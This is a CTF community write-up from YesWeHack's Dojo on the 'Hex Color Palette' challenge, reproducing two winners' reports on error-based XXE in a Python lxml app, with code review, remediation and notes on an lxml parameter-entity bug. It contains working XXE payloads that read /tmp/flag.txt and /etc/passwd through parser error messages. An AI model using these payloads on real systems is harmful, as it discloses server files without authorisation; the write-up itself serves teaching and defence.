The Dojo challenge, Hex Color Palette, required participants to exploit an XXE (XML External Entity) vulnerability in order to trigger a file disclosure.
By crafting a malicious XML payload, they had to trick the parser into leaking the contents of a sensitive local file - specifically /tmp/flag.txt
๐ก Want to create your own monthly Dojo challenge and won a contributing award? Send us a message on Twitter!
The winners
Congrats to 0necloud, Cryptocat and 3c4d for the best write-ups! ๐ฅณ
The swag is on its way! ๐
Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.
Read on to find out how one of the winners managed to solve the challenge.
OVERALL BEST WRITE-UPS
This time, things were a little different โ and some context is needed.
The challenge was created by myself โ @pwnwithlove โ and while preparing it for release last month I realised that the original PoC no longer worked as expected.
After some investigation, I discovered that the issue was caused by an update to the Python lxml
library.
In particular, a bug report from Anatoly Katyushin (heart1ess) revealed that payloads relying on parameter entities had worked reliably until this update โ including in scenarios involving DTD injection and indirect file disclosure. However, changes in the underlying libxml2
library meant that lxml
now blocked such payloads.
This change explains why the challenge suddenly stopped working: although the intended solution remained valid, the parser no longer processed parameter entities the way it used to โ effectively breaking the error-based XXE vector the intended solution relied on.
To address this, we added a feature to Dojo that allows us to use the previous version of lxml
when creating challenges, and I left the challenge itself unchanged.
Instead, I have decided to publish two separate reports for this community write-up: one detailing the intended PoC before the lxml
update, and another showcasing the exploitation technique based on Anatoly Katyushin (heart1ess) discovery!
โโโโโ START OF 0necloudโs REPORT โโโโโ
Description
This challenge revolves around a Python web application that renders user-supplied XML data through a templated HTML interface. The application uses the lxml
library to parse XML files and extract hexadecimal colour codes to populate a front-end colour palette. However, the XML parser is configured to allow external Document Type Definitions (DTDs) and resolve entities, which opens the door to an XML External Entity (XXE) injection vulnerability.
Due to insufficient input validation and insecure parser configurations, an attacker is able to inject arbitrary entity declarations, thereby allowing him to manipulate the server into disclosing files stored on it.
Exploitation
To identify potential vulnerabilities within an application, analysing the source code is an effective approach as it reveals insecure coding practices, such as improper input validation or the misuse of certain libraries. In this scenario, we are presented with a web application that accepts a user input, which is then parsed by the program - potentially influencing the contents returned to the user.
Code Analysis
The first step in performing our taint tracking is to examine how our input is being handled by the program. In this scenario, a Web Application Firewall URL-encodes the user input before it reaches the web server.
data = unquote(USER_INPUT)
try:
parsed_text, colors = promptFromXML(data)
except Exception as e:
parsed_text = f"Error : {str(e)}"
colors = []
print(template.render(output=parsed_text, colors=colors, image=None))
Our user input is first decoded using the unquote()
function, returning to its original form (our raw input) before being passed to the parse_palette()
function. The result of XML parsing, or any errors that occurs, is echoed back to the user in a templated HTML response. This hints that our payload could manipulate the contents of error messages, which often tend to be verbose.
def parse_palette(xml_data):
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
tree = etree.parse(io.StringIO(xml_data), parser)
root = tree.getroot()
colors = set()
# Only parsing hex color
for elem in root.iter():
if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
colors.add(elem.text.strip().lower())
return list(colors)
The parse_palette()
function is where the bulk of the data processing lies at. There are a few key points that can be noted regarding the function's implementation:
-
load_dtd=True
: allows the XML parser to load external DTDs resolve_entities=True
: enables the expansion of external entities- There is no sanitisation of the
xml_data
parameter
In the setup code, we can observe that there is a DTD file located at /tmp/xml/config.dtd
:
with open("xml/config.dtd", 'w') as f:
f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')
Note the reference to an undefined entity %config_hex
.
Conclusions drawn from Code Analysis
From the configuration of lxml.etree.XMLParser
in which both load_dtd
and resolve_entities
were set to True
, we can deduce that the application will:
- 1. Load external DTDs from file paths
- 2. Expand nested parameter entities
- 3. Attempt to resolve file paths provided within entity values
From the DTD file stored at /tmp/xml/config.dtd
which contains an undefined entity %config_hex
, we can deduce the possibility of overriding this entity with arbitrary ones, which will be subsequently loaded by the parser. Based on this idea, we can slowly piece together a payload:
To begin with, we need to load the local DTD at /tmp/xml/config.dtd
:
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd"
Next, we need to override %config_hex
, which could have nested parameter entities that would be expanded via the parser's resolve_entities=True
configuration. We need to include the following:
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
This allows reads the contents of /tmp/flag.txt
into the %flag
entity.
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
This creates a nested entity %error
that references a non-existent file path (aaa
) with the flag appended to it.
%eval;
This expands %eval
, which causes the parser to resolve %error
.
Finally, we just need the parser to load /tmp/xml/config.dtd
, which will then encounter %config_hex
(which we have overridden).
%local_dtd;
The parser will then read the contents of /tmp/flag.txt
into %flag
, and within %error
, construct a path file:///aaa/{FLAG_CONTENT}
. Since the filepath aaa/{FLAG_CONTENT}
most probably does not exist, an error containing the resolved path will be thrown, and the resolved path will be returned as part of the error message (hopefully).
Proof of Concept
Before we merge everything together, we need to note that some characters need to be replaced with their Unicode hex character codes to bypass parser restrictions and prevent premature expansions during entity parsing.
%
->%
&
->&
'
->'
Double-encoding is also used to delay expansions. For example, &#x25;
-> %
-> %
.
PAYLOAD:
<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///aaa/%flag;'>">%eval;'>
%local_dtd;
]>
FLAG: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}
Risk
This vulnerability presents a serious risk as it allows an attacker to read files on the server, leading to a loss of confidentiality. For example, we are able to leak the contents of /etc/passwd
:
Remediation
To remediate this vulnerability, the configuration options of the lxml.etree.XMLParser
, in particular, load_dtd
and resolve_entities
should be set to False
to prevent the loading of DTDs and entity expansions.
Input validation and sanitisation should be incorporated before the user input is processed by the parse_palette()
function to prevent blacklisted characters and keywords (e.g. <!DOCTYPE
, SYSTEM
) from being parsed.
Additionally, error messages returned to the user should avoid including the XML parser's error messages as these could unintentionally leak file paths, stack traces, and in this scenario, the contents of arbitrary files.
โโโโโ END OF 0necloudโs REPORT โโโโโ
As explained earlier, this approach no longer works with the current version of lxml
.
Even with resolve_entities=True
, it's no longer possible to trigger an XXE using parameter entities - which were previously exploitable regardless of this setting.
Now it's time to take a closer look at the behavior we discussed earlier - illustrated through CryptoCatโs report ๐
โโโโโ START OF Crypto-Catโs REPORT โโโโโ
Description
With this application, you can now display your own hex color palettes and unleash your inner UX designer! Simply upload your own XML files to generate custom palettes. Can you find the flag?
The flag can be found in /tmp/flag.txt
Solution
In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Pwnii ๐
Source code review
setup.py
Starting with the server setup code, we see that the flag is places in the /tmp
directory, along with a folder of templates
and xml
files.
os.chdir("/tmp/")
os.makedirs("templates", exist_ok=True)
os.makedirs("xml", exist_ok=True)
with open("flag.txt", "w") as f:
f.write(flag)
There's a sample XML file and DTD.
with open("xml/sample.xml", 'w') as f:
f.write('''
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#FF5733</color>
<color>#1E3A8A</color>
<color>#2ECC71</color>
<color>#F1C40F</color>
<color>#8E44AD</color>
<color>#2C3E50</color>
<color>#FFC0CB</color>
<color>#00FFFF</color>
</colors>
''')
with open("xml/config.dtd", 'w') as f:
f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')
An index.tpl
file is generated, I'll skip most of the CSS/HTML which does not seem relevant.
<div class="content">
<h2>Extracted Color Palette</h2>
<p class="debug">{{ output }}</p>
<div class="palette">
{% if colors %} {% for color in colors %}
<div class="color-box" style="background: {{ color }};">{{ color }}</div>
{% endfor %} {% else %}
<p class="debug">No colors detected.</p>
{% endif %}
</div>
</div>
challenge.py
Now onto the challenge code. It imports jinja2
and lxml
which should make us think of SSTI and/or XXE vulnerabilities. It specifically loads version 5.3.2
of lxml
so checking if it's the latest version or there are known vulnerabilities should be added to our TODO list.
from jinja2 import Environment, FileSystemLoader
lxml = import_v("lxml", "5.3.2")
from lxml import etree
Next, the template is loaded. The autoescape
option will prevent XSS by escaping HTML variables.
template = Environment(
autoescape=True,
loader=FileSystemLoader('/tmp/templates'),
).get_template('index.tpl')
A parse_palette
function is declared. First thing to note is it's susceptibility to XXE attacks:
- load_dtd=True
โ allows loading external/internal DTDs.
- resolve_entities=True
โ allows expanding general and parameter entities.
def parse_palette(xml_data):
parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
tree = etree.parse(io.StringIO(xml_data), parser)
root = tree.getroot()
colors = set()
# Only parsing hex color
for elem in root.iter():
if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
colors.add(elem.text.strip().lower())
return list(colors)
However, there is some regex on the XML elements to ensure they match a hex colour code format. It must start with a #
, followed by 3-6 hex characters e.g. #1337
or #420420
.
There's one more function; promptFromXML
. It simply takes a string and passes it to the parse_palette
function we just looked at.
def promptFromXML(s: str):
if not s:
return "No XML data received.", []
return "Pallet successfully extracted", parse_palette(s)
Finally, the script ties it all together. It takes our user input (note this is URL-encoded by the WAF, hence the unquote
) and passes it to the promptFromXML
function. The parsed colours will be returned and then rendered using template.render.
data = unquote("USER_INPUT_GOES_HERE")
try:
parsed_text, colors = promptFromXML(data)
except Exception as e:
parsed_text = f"Error : {str(e)}"
colors = []
print(template.render(output=parsed_text, colors=colors, image=None))
Testing functionality
The setup.py
code provided a sample XML file. It's a good idea to test it first, just to visualise the intended functionality of the app.
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#1337</color>
<color>#420420</color>
</colors>
The colours are "successfully extracted" from our XML input and rendered in the template.
If we can exploit an XXE vulnerability to read flag.txt
, we'll need to either:
- Somehow render the contents as colour codes
- Trigger an exception that leaks the contents via an error
XXE in lxml library
Remember when we reviewed the source code and made a note to check for known vulnerabilities in the lxml
library? Well, version 5.4.0
was released ~6 weeks ago. Why wouldn't Pwnii include the latest version? ๐ง
Let's check out the "bugs fixed" section in the release notes.
- LP#2107279: Binary wheels use libxml2 2.13.8 and libxslt 1.1.43 to resolve several CVEs.
- (Binary wheels for Windows continue to use a patched libxml2 2.11.9 and libxslt 1.1.39.)
- Issue found by Anatoly Katyushin, see https://bugs.launchpad.net/lxml/+bug/2107279
Reviewing the link reveals some key information about versions 5.0.0
through 5.3.2
.
- lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction
However..
- libxml doesn't restrict Parameter Entities, that leads to XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % b "<!ENTITY c '%file;'>">
'>
%a;
%b;
]>
<msg>&c;</msg>
The challenge meets both conditions:
- Using
lxml < 5.4.0
resolve_entities
is set to True
Error-based data exfiltration
Can we do something similar? Let's try and swap out the values.
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a;
%b;
]>
<colors><color>&c;</color></colors>
1. %file; reads /tmp/flag.txt
(still allowed for parameter entities).
2. %b; creates a general entity c whose SYSTEM URI becomes meow://<contents-of-flag.txt>
.
3. When the parser meets &c
; it tries to fetch that URI but fails and raises an error (apparently meow is not a real protocol ๐).
4. The wrapper catches the exception and prints it: Error : Invalid URI: meow://FLAG{.*}
.
It worked! We get the flag: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}
๐
Remediation
- Upgrade lxml >=โฏ5.4.0.
- Disable load_dtd
or at least resolve_entities
when you do not expect complex DTDs.
- Sanityโcheck and fully whitelist incoming XML before feeding it to a parser.
Summary (TLDR)
In this challenge, we're given a colour palette viewer that parses XML files using an outdated version of lxml
. Turns out, it's vulnerable to XXE. With both load_dtd
and resolve_entities
enabled, and version 5.3.2
in play, we can pull off a parameter entity injection to leak the contents of /tmp/flag.txt
. Since the parser throws an error on weird URIs, we abuse that to leak the flag through a debug message. Classic error-based XXE, but with a nice UX-themed twist.
โโโโโ END OF Cryptocatโs REPORT โโโโโ